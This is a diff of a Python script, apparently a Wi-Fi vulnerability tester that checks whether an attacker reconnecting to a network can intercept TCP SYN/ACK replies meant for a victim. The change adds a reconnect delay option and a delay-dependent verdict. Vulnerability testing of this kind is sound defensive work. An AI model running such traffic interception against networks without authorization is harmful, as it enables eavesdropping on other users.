| skipped 437 lines |
438 | 438 | | if self.options.same_id: |
439 | 439 | | log(STATUS, f">>> Received TCP SYN/ACK after connecting and reconnecting as {self.id_victim}.", color="green") |
440 | 440 | | else: |
441 | | - | log(STATUS, f">>> Attacker {self.id_attacker} intercepted TCP SYN/ACK reply to victim {self.id_victim}.", color="red") |
442 | | - | log(STATUS, f">>> This means the network is vulnerable!", color="red") |
| 441 | + | delay = time.time() - self.time_start_reconnect |
| 442 | + | log(STATUS, f">>> Attacker {self.id_attacker} intercepted TCP SYN/ACK reply" \ |
| 443 | + | f" to victim {self.id_victim} after {delay:.1f}s.", color="red") |
| 444 | + | if delay < 10: |
| 445 | + | log(STATUS, f">>> This means the network is vulnerable!", color="red") |
| 446 | + | else: |
| 447 | + | log(STATUS, f">>> This means the network is vulnerable, but the {delay:.1f}s " \ |
| 448 | + | "delay until interception makes attacks harder.", color="orange") |
443 | 449 | | quit(1) |
444 | 450 | | |
445 | 451 | | |
| skipped 129 lines |
575 | 581 | | # Step 2. Reconnect |
576 | 582 | | # |
577 | 583 | | |
578 | | - | time_start_reconnect = time.time() |
| 584 | + | self.time_start_reconnect = time.time() |
579 | 585 | | |
580 | 586 | | if self.options.other_bss: |
581 | 587 | | # If --other-bss was used, then blacklist the victim BSSID we just used. |
| skipped 7 lines |
589 | 595 | | # When not using --other-bss, force reconnecting to the same AP |
590 | 596 | | self.set_bssid(self.bssid_victim) |
591 | 597 | | |
| 598 | + | if self.options.delay != 0: |
| 599 | + | self.disconnect(wait=True) |
| 600 | + | log(STATUS, f"Sleeping for {self.options.delay}s before reconnecting") |
| 601 | + | time.sleep(self.options.delay) |
| 602 | + | |
592 | 603 | | if self.options.same_id: |
593 | 604 | | log(STATUS, f"Reconnecting as the victim...", color="green") |
594 | 605 | | self.connect(self.netid_victim, timeout=20) |
| skipped 5 lines |
600 | 611 | | log(STATUS, f"Listening for replies to the victim's TCP SYN request...", color="green") |
601 | 612 | | self.get_ip_address() |
602 | 613 | | |
603 | | - | time_reconnect = time.time() - time_start_reconnect |
604 | | - | if time_reconnect > 9: |
| 614 | + | time_reconnect = time.time() - self.time_start_reconnect |
| 615 | + | if time_reconnect > self.options.delay + 9: |
605 | 616 | | log(WARNING, f"Took {time_reconnect:.1f}s to reconnect & confirm IP." + \ |
606 | 617 | | " This is slow, may cause test to fail. Options are:") |
607 | 618 | | log(WARNING, f"- Assure server still sends SYN/ACKs after this time. If so, this script will still work.") |
| skipped 139 lines |
747 | 758 | | parser.add_argument("--config", default="client.conf", help="Config containing victim and attacker credentials.") |
748 | 759 | | parser.add_argument("--server", default="8.8.8.8", help="Server to send TCP SYN to.") |
749 | 760 | | parser.add_argument("--ping", default=False, action="store_true", help="Perform ping to test connection.") |
| 761 | + | parser.add_argument("--delay", default=0, type=float, help="Time to wait before reconnecting as attacker.") |
750 | 762 | | parser.add_argument("-d", "--debug", action="count", default=0, help="Increase output verbosity.") |
751 | 763 | | parser.add_argument("--other-bss", default=False, action="store_true", help="User different BSS=AP for victim/attacker.") |
752 | 764 | | parser.add_argument("--no-ssid-check", default=False, action="store_true", help="Allow victim and attacker to use different SSIDs.") |
| skipped 44 lines |